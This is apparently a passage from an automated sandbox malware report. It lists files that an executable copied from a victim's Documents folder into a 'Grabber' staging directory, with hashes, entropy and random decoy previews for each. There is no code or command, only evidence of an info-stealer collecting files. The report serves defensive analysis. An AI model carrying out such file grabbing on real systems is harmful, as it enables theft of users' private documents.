SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU.pdf

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\LTKMYBSEYZ.pdf

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\YPSIACHYXW.jpg

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\ZBEDCJPBEY.png

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6994061563025005
Encrypted:	false
SSDEEP:	24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5:	A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:	6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:	A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:	0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:	false
Preview:	ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\UMMBDNEQBN.png

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ.jpg

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
